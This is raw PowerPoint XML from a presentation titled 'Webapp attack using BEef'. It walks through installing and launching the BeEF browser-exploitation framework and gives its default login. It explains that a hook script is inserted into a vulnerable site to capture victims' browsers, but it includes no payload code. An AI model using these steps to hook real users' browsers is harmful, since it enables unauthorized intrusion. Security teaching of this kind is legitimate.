                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>” to launch the framework instead of “beef” as it was on earlier version. However, if you had </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BEeF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> pre-installed before or you have to install it, the installation command is the same.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75FD2930-9540-1DA6-4653-AF1DB89A32A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF8586C6-84AD-D9E5-3C23-65CED0AB2C55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4340672" y="3981797"/>
            <a:ext cx="333136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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="16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apt install beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="16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xss</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="9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A25F1128-820B-438C-3167-3B8635EC17AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3836894" y="3967775"/>
            <a:ext cx="4706471" cy="320432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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AA1FF5A4-9B5D-E57E-C112-BFA07A7C2995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="4631401"/>
            <a:ext cx="6096000" cy="360483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Step 2: Launching beef hacking framework</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ED7C34B2-4647-FC69-38B8-F9AE9663155D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="5091017"/>
            <a:ext cx="10450606" cy="646331"/>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After installing Beef we now move on to the second step which is starting the framework in order to access the user interface and get the hook we need to attack our victim.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB600448-BE25-1A48-E127-4A5B035B3EC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4773078" y="6010411"/>
            <a:ext cx="164179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Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400"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beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">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xss</a:t>
            </a:r>
            <a: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9" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB82730-DC1D-E47F-299F-840CB531B691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765177" y="6002763"/>
            <a:ext cx="3379695" cy="320432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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20" name="Date Placeholder 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0945D9E-9298-4542-2800-D899C98DBB82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF44D3-B259-4718-9D7B-C18B9857DAB5}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Slide Number Placeholder 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B663218C-DC74-C4F0-8C14-35738110C523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148208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3DB51-12CE-BF33-86B9-7AA6E53E687C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04E9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:45 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A5E0C23-1146-087F-44CE-D3095270EC02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CCBC3FF-D1E1-D023-FE3E-2D152097F6A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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42FB99F-8703-5AC9-26B8-D9B7E2D79FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699246" y="543742"/>
            <a:ext cx="10838329" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>On the area in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>red box</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, we have two very important things; the web UI - this is the link address from which you will access the user panel of the beef hacking framework and the web-hook - this is a JavaScript script which you need to insert to the vulnerable website in order to hook your victim’s browser in beef hacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94CEECC2-CEA3-2DBE-5709-17178F098689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639114" y="1622610"/>
            <a:ext cx="6944157" cy="4691648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215227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705744-82B9-6AFA-BAEE-E3ADF089AE69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04E9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:46 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CCD0014-6AA5-D756-5515-24ECC49E90B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB414918-5E28-1CB4-DB11-5C439488BF7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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4143FEE-57D6-C9AA-06D8-B35EC7C4F4BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663388" y="411939"/>
            <a:ext cx="6096000" cy="458074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:sp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The web UI should look like the one below</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C63F13B1-0BB5-CEA8-AAB7-EB453A4ED10D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2934458" y="1180781"/>
            <a:ext cx="6393815" cy="3409148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F0EE6AF-F197-A4C6-042B-CCBD6D0ED5EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3415553" y="5804777"/>
            <a:ext cx="5235388" cy="734136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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99C0E6B-E914-B070-44AD-8B41AAFBB4CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2992713" y="5731247"/>
            <a:ext cx="6096000" cy="827406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NOTE:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> default password is and username is “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>beef:beef</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939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132</TotalTime>
  <Words>1452</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>135</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Courier New</vt:lpstr>
      <vt:lpstr>Euphemia</vt:lpstr>
      <vt:lpstr>Plantagenet Cherokee</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Academic Literature 16x9</vt:lpstr>
      <vt:lpstr>Webapp attack using BEef</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Content  </vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Installation of BeEF</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Steps to Perform BeEF Hacking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Webapp attack using BEef</dc:title>
  <dc:creator>rahul joshi</dc:creator>
  <cp:lastModifiedBy>rahul joshi</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-09T14:45:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-09T16:58:15Z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